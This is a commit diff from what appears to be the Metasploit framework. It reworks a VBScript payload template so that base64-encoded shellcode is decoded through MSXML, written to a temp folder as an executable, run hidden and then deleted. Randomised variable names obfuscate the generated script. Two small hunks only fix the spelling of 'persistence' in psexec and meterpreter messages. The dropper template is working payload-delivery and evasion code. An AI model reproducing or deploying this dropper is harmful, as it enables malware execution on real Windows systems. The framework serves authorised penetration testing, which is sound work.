Land rapid7#6625, Send base64ed shellcode and decode with certutil (Actually MSXML)

Author: bwatters-r7

data/templates/scripts/to_exe.vbs.template

@@ -1,23 +1,31 @@
-Function %{var_func}()
-	%{var_shellcode} = "%{hex_shellcode}"
+Function %{var_decodefunc}(%{var_decodebase64})
+	%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
+		"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
+		%{var_decodebase64} & "</B64DECODE>"
+	Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
+	%{var_xmldoc}.LoadXML(%{var_xml})
+	%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
+	set %{var_xmldoc} = nothing
+End Function
 
+Function %{var_func}()
+	%{var_shellcode} = "%{base64_shellcode}"
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
-	Dim %{var_stream}
 	Dim %{var_tempdir}
-	Dim %{var_tempexe}
 	Dim %{var_basedir}
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
 	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
-	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
-	For i = 1 to Len(%{var_shellcode}) Step 2
-	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
-	Next
-	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")
+	%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
+	Set %{var_adodbstream} = CreateObject("ADODB.Stream")
+	%{var_adodbstream}.Type = 1
+	%{var_adodbstream}.Open
+	%{var_adodbstream}.Write %{var_decoded}
+	%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
 	%{var_shell}.run %{var_tempexe}, 0, true
 	%{var_obj}.DeleteFile(%{var_tempexe})
 	%{var_obj}.DeleteFolder(%{var_basedir})

lib/msf/core/exploit/smb/client/psexec.rb

@@ -164,7 +164,7 @@ def psexec(command, disconnect=true)
           if service_exists
             print_warning("Not removing service as it already existed...")
           elsif datastore['SERVICE_PERSIST']
-            print_warning("Not removing service for persistance...")
+            print_warning("Not removing service for persistence...")
           else
             vprint_status("Removing the service...")
             svc_status = svc_client.deleteservice(svc_handle)

lib/msf/util/exe.rb

@@ -1266,18 +1266,22 @@ def self.to_exe_vbs(exes = '', opts = {})
 
     hash_sub = {}
     hash_sub[:exe_filename]  = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
+    hash_sub[:base64_filename]  = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
     hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_fname]     = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_func]      = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_stream]    = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_obj]       = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_shell]     = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_tempdir]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_tempexe]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_basedir]   = Rex::Text.rand_text_alpha(rand(8)+8)
-
-    hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
-
+    hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
+    hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:init] = ""
 
     if persist

scripts/meterpreter/persistence.rb

@@ -228,7 +228,7 @@ def install_as_service(script_on_target)
 
 # Check for Version of Meterpreter
 wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
-print_status("Running Persistance Script")
+print_status("Running Persistence Script")
 # Create undo script
 @clean_up_rc = log_file()
 print_status("Resource file for cleanup created at #{@clean_up_rc}")